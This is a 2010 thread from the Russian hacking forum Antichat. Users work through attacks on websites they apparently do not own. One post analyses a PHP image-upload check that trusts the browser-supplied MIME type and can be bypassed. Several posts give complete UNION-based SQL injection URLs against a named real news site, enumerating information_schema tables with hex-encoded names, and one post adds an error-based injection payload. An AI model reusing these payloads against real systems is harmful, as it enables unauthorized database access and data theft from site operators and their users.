ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
13.03.2010, 19:09
|
|
Познающий
Регистрация: 17.09.2008
Сообщений: 56
Провел на форуме:
587324
Репутация:
40
|
|
Сообщение от Pashkela
Ссылку дай и не тупи))) Subquery returns more than 1 row - это и есть вывод ошибки
Ошибка появляется когда через MySQL-Front этот запрос делаю, а в скрипте то тупо белый экран и все
|
|
|
13.03.2010, 20:50
|
|
Участник форума
Регистрация: 07.03.2008
Сообщений: 141
Провел на форуме:
405538
Репутация:
23
|
|
Имеется такой код:
PHP код:
$filetype = $_FILES['imagen']['type'];
$name = $_FILES['imagen']['name'];
$extension = get_extension($name);
$imagen = $id.".".$extension;
if (!((strpos($filetype, "gif") || strpos($filetype, "jpeg") || strpos($filetype, "bmp"))))
{
$message = "Error";
}
Получается, проверяется только тип, передаваемый браузером. Т.е. можно сформировать фейковый пакет с типом image/gif, а заливать любой файл, так? |
|
|
|
13.03.2010, 20:59
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557
Репутация:
606
|
|
Сообщение от Nek1t
Имеется такой код:
PHP код:
$filetype = $_FILES['imagen']['type'];
$name = $_FILES['imagen']['name'];
$extension = get_extension($name);
$imagen = $id.".".$extension;
if (!((strpos($filetype, "gif") || strpos($filetype, "jpeg") || strpos($filetype, "bmp"))))
{
$message = "Error";
}
Получается, проверяется только тип, передаваемый браузером. Т.е. можно сформировать фейковый пакет с типом image/gif, а заливать любой файл, так? можно, только там дописывается расширение gif, jpg или bmp. Только прозреваю, что двойное расширение и нульбайт не пройдет, ибо $id наверняка задается как цифра (будет файл вида 32.gif или 45.jpg, 65.bmp).
Это случайно не голландский сайт?
Последний раз редактировалось попугай; 13.03.2010 в 21:03..
|
|
|
|
13.03.2010, 21:18
|
|
Постоянный
Регистрация: 06.01.2010
Сообщений: 785
Провел на форуме:
1777031
Репутация:
256
|
|
И снова я 
Вот все же не могу разобраться. Вот что ввожу:
Код:
http://www.f1-world.ru/news/news.php3?idnews=-1003090020+union+select+1,COLUMN_NAME,3,4,5,6,7,8,9%20,10,11,12+from+information_schema.columns+where+table_name=%27COLUMN_PRIVILEGES%27+LIMIT+1,1+--+
По идее должны выводится столбцы таблицы COLUMN_PRIVILEGES. Но у меня просто ошибка Что не так делаю? |
|
|
|
13.03.2010, 21:19
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696
Репутация:
2221
|
|
Сообщение от CyberHunter
И снова я
Вот все же не могу разобраться. Вот что ввожу:
Код:
http://www.f1-world.ru/news/news.php3?idnews=-1003090020+union+select+1,COLUMN_NAME,3,4,5,6,7,8,9%20,10,11,12+from+information_schema.columns+where+table_name=%27COLUMN_PRIVILEGES%27+LIMIT+1,1+--+
По идее должны выводится столбцы таблицы COLUMN_PRIVILEGES. Но у меня просто ошибка Что не так делаю?
http://www.f1-world.ru/news/news.php3?idnews=-1003090020+union+select+1,COLUMN_NAME,3,4,5,6,7,8, 9,10,11,12+from+information_schema.columns+where+t able_name=0x434f4c554d4e5f50524956494c45474553+LIM IT+1,1+--+
Хексить религия не позваляет?
|
|
|
|
13.03.2010, 21:44
|
|
Участник форума
Регистрация: 07.03.2008
Сообщений: 141
Провел на форуме:
405538
Репутация:
23
|
|
Сообщение от попугай
можно, только там дописывается расширение gif, jpg или bmp.
Код еще раз глянь, расширение берется то, которое пришло: $imagen = $id.".".$extension; //imagename
Сообщение от попугай
Только прозреваю, что двойное расширение и нульбайт не пройдет, ибо $id наверняка задается как цифра (будет файл вида 32.gif или 45.jpg, 65.bmp).
Ну да, это я еще с начала попробовал.
Сообщение от попугай
Это случайно не голландский сайт?
Лол, нет.
|
|
|
|
13.03.2010, 21:47
|
|
Постоянный
Регистрация: 06.01.2010
Сообщений: 785
Провел на форуме:
1777031
Репутация:
256
|
|
Хексить религия не позваляет?
Ну с этим понятно, но почему при таком вводе опять ошибка?
http://www.f1-world.ru/news/news.php3?idnews=-1003090020+union+select+1,column_name,3,4,5,6,7,8, %209,10,11,12+from+information_schema.columns+wher e+table_name=hex%28%27fusers%27%29+limit+1,1+--+
Или как нужно "хексить" ?
|
|
|
|
13.03.2010, 21:52
|
|
Участник форума
Регистрация: 18.06.2008
Сообщений: 222
Провел на форуме:
2223440
Репутация:
648
|
|
Сообщение от CyberHunter
Ну с этим понятно, но почему при таком вводе опять ошибка?
Или как нужно "хексить" ?
Мдаа, а ты задумывался над тем, что ты написал?)
Код:
http://www.f1-world.ru/news/news.php3?idnews=-1003090020+union+select+1,column_name,3,4,5,6,7,8,9,10,11,12+from+information_schema.columns+where+table_name=0x7573657273+limit+1,1+--+
|
|
|
|
13.03.2010, 21:53
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696
Репутация:
2221
|
|
Сообщение от CyberHunter
Ну с этим понятно, но почему при таком вводе опять ошибка?
Или как нужно "хексить" ?
http://ctacok.ru/he.php?c=text2hex
|
|
|
|
13.03.2010, 23:16
|
|
Новичок
Регистрация: 24.06.2007
Сообщений: 5
Провел на форуме:
487247
Репутация:
3
|
|
0+or+(select+count(*)+from+information_schema.tabl es+group+by+concat(version(),floor(rand (0)*2)))
как работаит ета sql injection?
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
